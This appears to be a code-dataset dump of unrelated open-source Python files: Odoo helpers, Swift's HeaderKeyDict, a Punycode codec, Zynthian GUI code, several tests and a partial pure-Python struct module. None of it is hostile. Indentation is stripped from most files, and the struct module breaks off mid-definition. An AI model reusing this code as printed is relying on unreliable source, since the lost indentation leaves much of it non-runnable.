elif code0 == code1 - 1:
k = self.dump_char(code0)
else:
k = "%s..%s" % (self.dump_char(code0),
self.dump_char(code1 - 1))
self.dump_trans(k, set, file)
def dump_char(self, code):
if 0 <= code <= 255:
return repr(chr(code))
else:
return "chr(%d)" % code
def dump_trans(self, key, set, file):
file.write(" %s --> %s\n" % (key, self.dump_set(set)))
def dump_set(self, set):
return state_set_str(set)
#
# State set manipulation functions
#
#def merge_state_sets(set1, set2):
# for state in set2.keys():
# set1[state] = 1
def state_set_str(set):
state_list = set.keys()
str_list = []
for state in state_list:
str_list.append("S%d" % state.number)
return "[%s]" % string.join(str_list, ",")
|
savoirfairelinux/connector-interfaces
|
refs/heads/8.0
|
test_base_import_async/__openerp__.py
|
2
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Module for OpenERP
# Copyright (C) 2014 ACSONE SA/NV (http://acsone.eu).
# @author Stéphane Bidoul <stephane.bidoul@acsone.eu>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Test suite for base_import_async',
'version': '1.0',
'author': 'ACSONE SA/NV, Odoo Community Association (OCA)',
'license': 'AGPL-3',
'category': 'Generic Modules',
'description': """Test suite for base_import_async.
Normally you don't need to install this.
""",
'depends': [
'base_import_async',
'account',
],
'installable': True,
'application': False,
}
|
Gitlab11/odoo
|
refs/heads/8.0
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/lib/functions.py
|
292
|
##########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
##############################################################################
import uno
import xmlrpclib
import re
import socket
import cPickle
import marshal
import tempfile
if __name__ != "package":
from gui import *
from logreport import *
from rpc import *
database="test"
uid = 1
def genTree(object, aList, insField, host, level=3, ending=None, ending_excl=None, recur=None, root='', actualroot=""):
if ending is None:
ending = []
if ending_excl is None:
ending_excl = []
if recur is None:
recur = []
try:
global url
sock=RPCSession(url)
global passwd
res = sock.execute(database, uid, passwd, object , 'fields_get')
key = res.keys()
key.sort()
for k in key:
if (not ending or res[k]['type'] in ending) and ((not ending_excl) or not (res[k]['type'] in ending_excl)):
insField.addItem(root+'/'+res[k]["string"],len(aList))
aList.append(actualroot+'/'+k)
if (res[k]['type'] in recur) and (level>0):
genTree(res[k]['relation'],aList,insField,host ,level-1, ending, ending_excl, recur,root+'/'+res[k]["string"],actualroot+'/'+k)
except:
obj=Logger()
import traceback,sys
info = reduce(lambda x, y: x+y, traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback))
obj.log_write('Function', LOG_ERROR, info)
def VariableScope(oTcur, insVariable, aObjectList, aComponentAdd, aItemList, sTableName=""):
if sTableName.find(".") != -1:
for i in range(len(aItemList)):
if aComponentAdd[i]==sTableName:
sLVal=aItemList[i][1][aItemList[i][1].find(",'")+2:aItemList[i][1].find("')")]
for j in range(len(aObjectList)):
if aObjectList[j][:aObjectList[j].find("(")] == sLVal:
insVariable.append(aObjectList[j])
VariableScope(oTcur,insVariable,aObjectList,aComponentAdd,aItemList, sTableName[:sTableName.rfind(".")])
else:
for i in range(len(aItemList)):
if aComponentAdd[i]==sTableName:
sLVal=aItemList[i][1][aItemList[i][1].find(",'")+2:aItemList[i][1].find("')")]
for j in range(len(aObjectList)):
if aObjectList[j][:aObjectList[j].find("(")] == sLVal and sLVal!="":
insVariable.append(aObjectList[j])
def getList(aObjectList, host, count):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
sMain=""
if not count == 0:
if count >= 1:
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sItem[sItem.find("(")+1:sItem.find(",")]=="objects":
sMain = sItem[sItem.find(",'")+2:sItem.find("')")]
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn":
if sItem[sItem.find("(")+1:sItem.find(",")]=="objects":
aObjectList.append(sItem[sItem.rfind(",'")+2:sItem.rfind("')")] + "(" + docinfo.getUserFieldValue(3) + ")")
else:
sTemp=sItem[sItem.find("(")+1:sItem.find(",")]
if sMain == sTemp[:sTemp.find(".")]:
getRelation(docinfo.getUserFieldValue(3), sItem[sItem.find(".")+1:sItem.find(",")], sItem[sItem.find(",'")+2:sItem.find("')")],aObjectList,host)
else:
sPath=getPath(sItem[sItem.find("(")+1:sItem.find(",")], sMain)
getRelation(docinfo.getUserFieldValue(3), sPath, sItem[sItem.find(",'")+2:sItem.find("')")],aObjectList,host)
else:
aObjectList.append("List of " + docinfo.getUserFieldValue(3))
def getRelation(sRelName, sItem, sObjName, aObjectList, host):
global url
sock=RPCSession(url)
global passwd
res = sock.execute(database, uid, passwd, sRelName , 'fields_get')
key = res.keys()
for k in key:
if sItem.find(".") == -1:
if k == sItem:
aObjectList.append(sObjName + "(" + res[k]['relation'] + ")")
return 0
if k == sItem[:sItem.find(".")]:
getRelation(res[k]['relation'], sItem[sItem.find(".")+1:], sObjName,aObjectList,host)
def getPath(sPath, sMain):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sPath[:sPath.find(".")] == sMain:
                break
else:
res = re.findall('\\[\\[ *([a-zA-Z0-9_\.]+) *\\]\\]',sPath)
                if len(res) != 0:
if sItem[sItem.find(",'")+2:sItem.find("')")] == sPath[:sPath.find(".")]:
sPath = sItem[sItem.find("(")+1:sItem.find(",")] + sPath[sPath.find("."):]
getPath(sPath, sMain)
return sPath
def EnumDocument(aItemList, aComponentAdd):
desktop = getDesktop()
parent=""
bFlag = False
Doc =desktop.getCurrentComponent()
#oVC = Doc.CurrentController.getViewCursor()
oParEnum = Doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.Anchor.TextTable:
#parent = oPar.Anchor.TextTable.Name
getChildTable(oPar.Anchor.TextTable,aItemList,aComponentAdd)
elif oPar.Anchor.TextSection:
parent = oPar.Anchor.TextSection.Name
elif oPar.Anchor.Text:
parent = "Document"
sItem=oPar.Items[1].replace(' ',"")
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn" and not oPar.Items in aItemList:
templist=oPar.Items[0],sItem
aItemList.append( templist )
aComponentAdd.append( parent )
def getChildTable(oPar, aItemList, aComponentAdd, sTableName=""):
sNames = oPar.getCellNames()
bEmptyTableFlag=True
for val in sNames:
oCell = oPar.getCellByName(val)
oCurEnum = oCell.createEnumeration()
while oCurEnum.hasMoreElements():
try:
oCur = oCurEnum.nextElement()
if oCur.supportsService("com.sun.star.text.TextTable"):
if sTableName=="":
getChildTable(oCur,aItemList,aComponentAdd,oPar.Name)
else:
getChildTable(oCur,aItemList,aComponentAdd,sTableName+"."+oPar.Name)
else:
oSecEnum = oCur.createEnumeration()
while oSecEnum.hasMoreElements():
oSubSection = oSecEnum.nextElement()
if oSubSection.supportsService("com.sun.star.text.TextField"):
bEmptyTableFlag=False
sItem=oSubSection.TextField.Items[1]
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn":
if aItemList.__contains__(oSubSection.TextField.Items)==False:
aItemList.append(oSubSection.TextField.Items)
if sTableName=="":
if aComponentAdd.__contains__(oPar.Name)==False:
aComponentAdd.append(oPar.Name)
else:
if aComponentAdd.__contains__(sTableName+"."+oPar.Name)==False:
aComponentAdd.append(sTableName+"."+oPar.Name)
except:
obj=Logger()
import traceback,sys
info = reduce(lambda x, y: x+y, traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback))
obj.log_write('Function', LOG_ERROR, info)
if bEmptyTableFlag==True:
aItemList.append((u'',u''))
if sTableName=="":
if aComponentAdd.__contains__(oPar.Name)==False:
aComponentAdd.append(oPar.Name)
else:
if aComponentAdd.__contains__(sTableName+"."+oPar.Name)==False:
aComponentAdd.append(sTableName+"."+oPar.Name)
return 0
def getRecersiveSection(oCurrentSection, aSectionList):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
oParEnum=doc.getText().createEnumeration()
aSectionList.append(oCurrentSection.Name)
if oCurrentSection.ParentSection:
getRecersiveSection(oCurrentSection.ParentSection,aSectionList)
else:
return
def GetAFileName():
oFileDialog=None
iAccept=None
sPath=""
InitPath=""
oUcb=None
oFileDialog = createUnoService("com.sun.star.ui.dialogs.FilePicker")
oUcb = createUnoService("com.sun.star.ucb.SimpleFileAccess")
oFileDialog.appendFilter("Odoo Report File","*.sxw")
oFileDialog.setCurrentFilter("Odoo Report File")
if InitPath == "":
InitPath =tempfile.gettempdir()
#End If
if oUcb.exists(InitPath):
oFileDialog.setDisplayDirectory(InitPath)
#End If
iAccept = oFileDialog.execute()
if iAccept == 1:
sPath = oFileDialog.Files[0]
oFileDialog.dispose()
return sPath
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
bratsche/Neutron-Drive
|
refs/heads/master
|
google_appengine/lib/django_1_3/django/contrib/sitemaps/models.py
|
914
|
# This file intentionally left blank
|
williamthegrey/swift
|
refs/heads/master
|
swift/common/header_key_dict.py
|
5
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
class HeaderKeyDict(dict):
"""
A dict that title-cases all keys on the way in, so as to be
case-insensitive.
"""
def __init__(self, base_headers=None, **kwargs):
if base_headers:
self.update(base_headers)
self.update(kwargs)
def update(self, other):
if hasattr(other, 'keys'):
for key in other.keys():
self[key.title()] = other[key]
else:
for key, value in other:
self[key.title()] = value
def __getitem__(self, key):
return dict.get(self, key.title())
def __setitem__(self, key, value):
if value is None:
self.pop(key.title(), None)
elif isinstance(value, six.text_type):
return dict.__setitem__(self, key.title(), value.encode('utf-8'))
else:
return dict.__setitem__(self, key.title(), str(value))
def __contains__(self, key):
return dict.__contains__(self, key.title())
def __delitem__(self, key):
return dict.__delitem__(self, key.title())
def get(self, key, default=None):
return dict.get(self, key.title(), default)
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def pop(self, key, default=None):
return dict.pop(self, key.title(), default)
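# Minimal usage sketch (illustrative only, not part of the module):
#
#   headers = HeaderKeyDict({'content-length': 0})
#   headers['x-object-meta-name'] = 'obj'
#   assert headers['CONTENT-LENGTH'] == '0'  # non-string values become str
#   assert 'content-LENGTH' in headers       # lookups title-case the key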
|
nekulin/arangodb
|
refs/heads/devel
|
3rdParty/V8-4.3.61/third_party/python_26/Lib/encodings/punycode.py
|
586
|
# -*- coding: iso-8859-1 -*-
""" Codec for the Punicode encoding, as specified in RFC 3492
Written by Martin v. Löwis.
"""
import codecs
##################### Encoding #####################################
def segregate(str):
"""3.1 Basic code point segregation"""
base = []
extended = {}
for c in str:
if ord(c) < 128:
base.append(c)
else:
extended[c] = 1
extended = extended.keys()
extended.sort()
return "".join(base).encode("ascii"),extended
def selective_len(str, max):
"""Return the length of str, considering only characters below max."""
res = 0
for c in str:
if ord(c) < max:
res += 1
return res
def selective_find(str, char, index, pos):
"""Return a pair (index, pos), indicating the next occurrence of
char in str. index is the position of the character considering
only ordinals up to and including char, and pos is the position in
the full string. index/pos is the starting position in the full
string."""
l = len(str)
while 1:
pos += 1
if pos == l:
return (-1, -1)
c = str[pos]
if c == char:
return index+1, pos
elif c < char:
index += 1
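# Illustrative example (added commentary, not in the original module):
# with str = u"a\xe9b\xe9" and char = u"\xe9", starting from
# (index, pos) = (-1, -1) returns (1, 1); feeding (1, 1) back in returns
# (3, 3), because 'b' (ordinal below 0xe9) also advances index.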
def insertion_unsort(str, extended):
"""3.2 Insertion unsort coding"""
oldchar = 0x80
result = []
oldindex = -1
for c in extended:
index = pos = -1
char = ord(c)
curlen = selective_len(str, char)
delta = (curlen+1) * (char - oldchar)
while 1:
index,pos = selective_find(str,c,index,pos)
if index == -1:
break
delta += index - oldindex
result.append(delta-1)
oldindex = index
delta = 0
oldchar = char
return result
def T(j, bias):
# Punycode parameters: tmin = 1, tmax = 26, base = 36
res = 36 * (j + 1) - bias
if res < 1: return 1
if res > 26: return 26
return res
digits = "abcdefghijklmnopqrstuvwxyz0123456789"
def generate_generalized_integer(N, bias):
"""3.3 Generalized variable-length integers"""
result = []
j = 0
while 1:
t = T(j, bias)
if N < t:
result.append(digits[N])
return result
result.append(digits[t + ((N - t) % (36 - t))])
N = (N - t) // (36 - t)
j += 1
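# Quick sanity check (illustrative): generate_generalized_integer(0, 72)
# yields ['a'], since T(0, 72) clamps to tmin = 1 and N = 0 < 1 stops
# the loop immediately with digits[0].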
def adapt(delta, first, numchars):
if first:
delta //= 700
else:
delta //= 2
delta += delta // numchars
# ((base - tmin) * tmax) // 2 == 455
divisions = 0
while delta > 455:
delta = delta // 35 # base - tmin
divisions += 36
bias = divisions + (36 * delta // (delta + 38))
return bias
def generate_integers(baselen, deltas):
"""3.4 Bias adaptation"""
# Punycode parameters: initial bias = 72, damp = 700, skew = 38
result = []
bias = 72
for points, delta in enumerate(deltas):
s = generate_generalized_integer(delta, bias)
result.extend(s)
bias = adapt(delta, points==0, baselen+points+1)
return "".join(result)
def punycode_encode(text):
base, extended = segregate(text)
base = base.encode("ascii")
deltas = insertion_unsort(text, extended)
extended = generate_integers(len(base), deltas)
if base:
return base + "-" + extended
return extended
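# Worked example (added for illustration, not in the original module):
# punycode_encode(u"b\xfccher") == "bcher-kva"; the five ASCII
# characters form the base string, and "kva" encodes the position and
# code point of the single extended character u"\xfc".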
##################### Decoding #####################################
def decode_generalized_number(extended, extpos, bias, errors):
"""3.3 Generalized variable-length integers"""
result = 0
w = 1
j = 0
while 1:
try:
char = ord(extended[extpos])
except IndexError:
if errors == "strict":
raise UnicodeError, "incomplete punicode string"
return extpos + 1, None
extpos += 1
if 0x41 <= char <= 0x5A: # A-Z
digit = char - 0x41
elif 0x30 <= char <= 0x39:
digit = char - 22 # 0x30-26
elif errors == "strict":
raise UnicodeError("Invalid extended code point '%s'"
% extended[extpos])
else:
return extpos, None
t = T(j, bias)
result += digit * w
if digit < t:
return extpos, result
w = w * (36 - t)
j += 1
def insertion_sort(base, extended, errors):
"""3.2 Insertion unsort coding"""
char = 0x80
pos = -1
bias = 72
extpos = 0
while extpos < len(extended):
newpos, delta = decode_generalized_number(extended, extpos,
bias, errors)
if delta is None:
# There was an error in decoding. We can't continue because
# synchronization is lost.
return base
pos += delta+1
char += pos // (len(base) + 1)
if char > 0x10FFFF:
if errors == "strict":
raise UnicodeError, ("Invalid character U+%x" % char)
char = ord('?')
pos = pos % (len(base) + 1)
base = base[:pos] + unichr(char) + base[pos:]
bias = adapt(delta, (extpos == 0), len(base))
extpos = newpos
return base
def punycode_decode(text, errors):
pos = text.rfind("-")
if pos == -1:
base = ""
extended = text
else:
base = text[:pos]
extended = text[pos+1:]
base = unicode(base, "ascii", errors)
extended = extended.upper()
return insertion_sort(base, extended, errors)
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
res = punycode_encode(input)
return res, len(input)
def decode(self,input,errors='strict'):
if errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+errors
res = punycode_decode(input, errors)
return res, len(input)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return punycode_encode(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
if self.errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+self.errors
return punycode_decode(input, self.errors)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='punycode',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
zynthian/zynthian-ui
|
refs/heads/master
|
zyngui/zynthian_gui_audio_out.py
|
1
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#******************************************************************************
# ZYNTHIAN PROJECT: Zynthian GUI
#
# Zynthian GUI Audio-Out Selector Class
#
# Copyright (C) 2015-2018 Fernando Moyano <jofemodo@zynthian.org>
#
#******************************************************************************
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the LICENSE.txt file.
#
#******************************************************************************
import sys
import tkinter
import logging
# Zynthian specific modules
import zynautoconnect
from . import zynthian_gui_config
from . import zynthian_gui_selector
#------------------------------------------------------------------------------
# Zynthian Audio-Out Selection GUI Class
#------------------------------------------------------------------------------
class zynthian_gui_audio_out(zynthian_gui_selector):
def __init__(self):
self.layer=None
self.end_layer = None
super().__init__('Audio Out', True)
def set_layer(self, layer):
self.layer = layer
try:
self.end_layer = self.zyngui.screens['layer'].get_fxchain_ends(self.layer)[0]
except:
self.end_layer = None
def fill_list(self):
self.list_data = []
for k in zynautoconnect.get_audio_input_ports().keys():
try:
title = self.zyngui.screens['layer'].get_layer_by_jackname(k).get_basepath()
except:
title = k
try:
ch = int(title.split('#')[0])-1
if ch==self.layer.midi_chan:
continue
except Exception as e:
#logging.debug("Can't get layer's midi chan => {}".format(e))
pass
if self.end_layer and k in self.end_layer.get_audio_out():
self.list_data.append((k, k, "[x] " + title))
else:
self.list_data.append((k, k, "[ ] " + title))
super().fill_list()
def fill_listbox(self):
super().fill_listbox()
def select_action(self, i, t='S'):
self.end_layer.toggle_audio_out(self.list_data[i][1])
self.fill_list()
def back_action(self):
self.zyngui.show_modal('layer_options')
return ''
def set_select_path(self):
self.select_path.set("Send Audio to ...")
#------------------------------------------------------------------------------
|
micropython/micropython
|
refs/heads/master
|
tests/float/string_format_modulo2.py
|
15
|
# test formatting floats with large precision, checking that it doesn't overflow the buffer
def test(num, num_str):
if num == float("inf") or num == 0.0 and num_str != "0.0":
# skip numbers that overflow or underflow the FP precision
return
for kind in ("e", "f", "g"):
# check precision either side of the size of the buffer (32 bytes)
for prec in range(23, 36, 2):
fmt = "%." + "%d" % prec + kind
s = fmt % num
check = abs(float(s) - num)
if num > 1:
check /= num
if check > 1e-6:
print("FAIL", num_str, fmt, s, len(s), check)
# check pure zero
test(0.0, "0.0")
# check some powers of 10, making sure to include exponents with 3 digits
for e in range(-8, 8):
num = pow(10, e)
test(num, "1e%d" % e)
|
enacuavlab/pprzros
|
refs/heads/master
|
pprzros/setup.py
|
1
|
## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# fetch values from package.xml
setup_args = generate_distutils_setup(
packages=['pprzros'],
package_dir={'': 'src'})
setup(**setup_args)
|
infoxchange/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.3/tests/regressiontests/handlers/tests.py
|
29
|
from django.utils import unittest
from django.conf import settings
from django.core.handlers.wsgi import WSGIHandler
class HandlerTests(unittest.TestCase):
def test_lock_safety(self):
"""
Tests for bug #11193 (errors inside middleware shouldn't leave
the initLock locked).
"""
# Mangle settings so the handler will fail
old_middleware_classes = settings.MIDDLEWARE_CLASSES
settings.MIDDLEWARE_CLASSES = 42
# Try running the handler, it will fail in load_middleware
handler = WSGIHandler()
self.assertEqual(handler.initLock.locked(), False)
try:
handler(None, None)
except:
pass
self.assertEqual(handler.initLock.locked(), False)
# Reset settings
settings.MIDDLEWARE_CLASSES = old_middleware_classes
|
django-nonrel/django-nonrel
|
refs/heads/develop
|
django/db/backends/mysql/validation.py
|
392
|
from django.db.backends import BaseDatabaseValidation
class DatabaseValidation(BaseDatabaseValidation):
def validate_field(self, errors, opts, f):
"""
There are some field length restrictions for MySQL:
- Prior to version 5.0.3, character fields could not exceed 255
characters in length.
- No character (varchar) fields can have a length exceeding 255
characters if they have a unique index on them.
"""
from django.db import models
db_version = self.connection.get_server_version()
varchar_fields = (models.CharField, models.CommaSeparatedIntegerField,
models.SlugField)
if isinstance(f, varchar_fields) and f.max_length > 255:
if db_version < (5, 0, 3):
msg = '"%(name)s": %(cls)s cannot have a "max_length" greater than 255 when you are using a version of MySQL prior to 5.0.3 (you are using %(version)s).'
elif f.unique == True:
msg = '"%(name)s": %(cls)s cannot have a "max_length" greater than 255 when using "unique=True".'
else:
msg = None
if msg:
errors.add(opts, msg % {'name': f.name, 'cls': f.__class__.__name__, 'version': '.'.join([str(n) for n in db_version[:3]])})
|
decause/pyglet-remy
|
refs/heads/master
|
tests/graphics/IMMEDIATE_INDEXED.py
|
18
|
#!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
import pyglet
from graphics_common import *
__noninteractive = True
class TEST_CASE(unittest.TestCase):
def check(self, expected, result, dimensions):
if len(expected) != len(result) * dimensions / 4:
self.fail('Incorrect number of vertices in feedback array')
for d in range(2):
for e, r in zip(expected[d::dimensions], result[d::4]):
if abs(e - r) > 0.01:
self.fail('Feedback array is in error: %r, %r' % \
(e, r))
def generic_test(self, v_fmt, v_data,
c_fmt=None, c_data=None,
t_fmt=None, t_data=None):
data = [(v_fmt, v_data)]
n_v = int(v_fmt[1])
if c_fmt:
data.append((c_fmt, c_data))
n_c = int(c_fmt[1])
if t_fmt:
data.append((t_fmt, t_data))
n_t = int(t_fmt[1])
vertices, colors, tex_coords = get_feedback(lambda: \
pyglet.graphics.draw_indexed(n_vertices, GL_TRIANGLES, index_data,
*data))
self.check(get_ordered_data(v_data, n_v), vertices, n_v)
if c_fmt:
self.check(get_ordered_data(c_data, n_c), colors, n_c)
if t_fmt:
self.check(get_ordered_data(t_data, n_t), tex_coords, n_t)
def test_v2f(self):
self.generic_test('v2f', v2f_data)
def test_v3f(self):
self.generic_test('v3f', v3f_data)
def test_v2f_c3f(self):
self.generic_test('v2f', v2f_data, 'c3f', c3f_data)
def test_v2f_c4f(self):
self.generic_test('v2f', v2f_data, 'c4f', c4f_data)
def test_v3f_c3f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data)
def test_v3f_c4f(self):
self.generic_test('v3f', v3f_data, 'c4f', c4f_data)
def test_v2f_t2f(self):
self.generic_test('v2f', v2f_data, None, None, 't2f', t2f_data)
def test_v3f_c3f_t2f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data, 't2f', t2f_data)
def test_v3f_c3f_t3f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data, 't3f', t3f_data)
def test_v3f_c4f_t4f(self):
self.generic_test('v3f', v3f_data, 'c4f', c4f_data, 't4f', t4f_data)
if __name__ == '__main__':
unittest.main()
|
bis12/yapwaf
|
refs/heads/master
|
examples/hello/app/models/user.py
|
2
|
import yapwaf as Y
from sqlalchemy import Column, Integer, String
class User(Y.Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
first_name = Column(String)
last_name = Column(String)
def __init__(self, first, last):
self.first_name = first
self.last_name = last
|
trotterdylan/grumpy
|
refs/heads/master
|
third_party/pypy/_struct.py
|
7
|
#
# This module is a pure Python version of pypy.module.struct.
# It is only imported if the vastly faster pypy.module.struct is not
# compiled in. For now we keep this version for reference and
# because pypy.module.struct is not ootype-backend-friendly yet.
#
"""Functions to convert between Python values and C structs.
Python strings are used to hold the data representing the C struct
and also as format strings to describe the layout of data in the C struct.
The optional first format char indicates byte order, size and alignment:
@: native order, size & alignment (default)
=: native order, std. size & alignment
<: little-endian, std. size & alignment
>: big-endian, std. size & alignment
!: same as >
The remaining chars indicate types of args and must match exactly;
these can be preceded by a decimal repeat count:
x: pad byte (no data);
c:char;
b:signed byte;
B:unsigned byte;
h:short;
H:unsigned short;
i:int;
I:unsigned int;
l:long;
L:unsigned long;
f:float;
d:double.
Special cases (preceding decimal count indicates length):
s:string (array of char); p: pascal string (with count byte).
Special case (only available in native format):
P:an integer type that is wide enough to hold a pointer.
Special case (not in native mode unless 'long long' in platform C):
q:long long;
Q:unsigned long long
Whitespace between formats is ignored.
The variable struct.error is an exception raised on errors."""
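# Illustrative format strings (added commentary, not in the original):
#   "<I"   one little-endian unsigned int (std. size, 4 bytes)
#   ">2h"  two big-endian signed shorts
#   "10s"  a 10-byte string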
import math
import sys
# TODO: XXX Find a way to get information on native sizes and alignments
class StructError(Exception):
pass
error = StructError
bytes = str
def unpack_int(data, index, size, le):
_bytes = [b for b in data[index:index + size]]
if le == 'little':
_bytes.reverse()
number = 0
for b in _bytes:
number = number << 8 | b
return int(number)
def unpack_signed_int(data, index, size, le):
number = unpack_int(data, index, size, le)
max = (1 << (size * 8))
if number > (1 << (size * 8 - 1)) - 1:
number = int(-1 * (max - number))
return number
INFINITY = 1e200 * 1e200
NAN = INFINITY / INFINITY
def unpack_char(data, index, size, le):
return data[index:index + size]
def pack_int(number, size, le):
x = number
res = []
for i in range(size):
res.append(x & 0xff)
x = x >> 8
if le == 'big':
res.reverse()
return ''.join(chr(x) for x in res)
def pack_signed_int(number, size, le):
if not isinstance(number, int):
raise StructError("argument for i,I,l,L,q,Q,h,H must be integer")
if number > (1 << (8 * size - 1)) - 1 or number < -1 * (1 << (8 * size - 1)):
raise OverflowError("Number:%i too large to convert" % number)
return pack_int(number, size, le)
def pack_unsigned_int(number, size, le):
if not isinstance(number, int):
raise StructError("argument for i,I,l,L,q,Q,h,H must be integer")
if number < 0:
raise TypeError("can't convert negative long to unsigned")
if number > (1 << (8 * size)) - 1:
raise OverflowError("Number:%i too large to convert" % number)
return pack_int(number, size, le)
def pack_char(char, size, le):
return str(char)
def isinf(x):
return x != 0.0 and x / 2 == x
def isnan(v):
return v != v * 1.0 or (v == 1.0 and v == 2.0)
def pack_float(x, size, le):
    unsigned = float_pack(x, size)
    result = []
    for i in range(size):  # emit exactly `size` bytes (4 for 'f', 8 for 'd')
        result.append((unsigned >> (i * 8)) & 0xFF)
    if le == "big":
        result.reverse()
    return ''.join(chr(x) for x in result)
def unpack_float(data, index, size, le):
    binary = [data[i] for i in range(index, index + size)]
    if le == "big":
        binary.reverse()
    unsigned = 0
    for i in range(size):
        b = binary[i]
        # tolerate both str items (Python 2) and int items (Python 3 bytes)
        unsigned |= (ord(b) if isinstance(b, str) else b) << (i * 8)
    return float_unpack(unsigned, size, le)
def round_to_nearest(x):
"""Python 3 style round: round a float x to the nearest int, but
unlike the builtin Python 2.x round function:
- return an int, not a float
- do round-half-to-even, not round-half-away-from-zero.
    We assume that x is finite and nonnegative; expect wrong results
    if you use this for negative x.
"""
int_part = int(x)
frac_part = x - int_part
if frac_part > 0.5 or frac_part == 0.5 and int_part & 1 == 1:
int_part += 1
return int_part
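# Round-half-to-even examples: round_to_nearest(2.5) == 2,
# round_to_nearest(3.5) == 4, round_to_nearest(2.4) == 2.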
def float_unpack(Q, size, le):
"""Convert a 32-bit or 64-bit integer created
by float_pack into a Python float."""
if size == 8:
MIN_EXP = -1021 # = sys.float_info.min_exp
MAX_EXP = 1024 # = sys.float_info.max_exp
MANT_DIG = 53 # = sys.float_info.mant_dig
BITS = 64
elif size == 4:
MIN_EXP = -125 # C's FLT_MIN_EXP
MAX_EXP = 128 # FLT_MAX_EXP
MANT_DIG = 24 # FLT_MANT_DIG
BITS = 32
else:
raise ValueError("invalid size value")
if Q >> BITS:
raise ValueError("input out of range")
# extract pieces
sign = Q >> BITS - 1
exp = (Q & ((1 << BITS - 1) - (1 << MANT_DIG - 1))) >> MANT_DIG - 1
mant = Q & ((1 << MANT_DIG - 1) - 1)
if exp == MAX_EXP - MIN_EXP + 2:
# nan or infinity
result = float('nan') if mant else float('inf')
elif exp == 0:
# subnormal or zero
result = math.ldexp(float(mant), MIN_EXP - MANT_DIG)
else:
# normal
mant += 1 << MANT_DIG - 1
result = math.ldexp(float(mant), exp + MIN_EXP - MANT_DIG - 1)
return -result if sign else result
def float_pack(x, size):
    """Convert a Python float x into a 32-bit or 64-bit unsigned
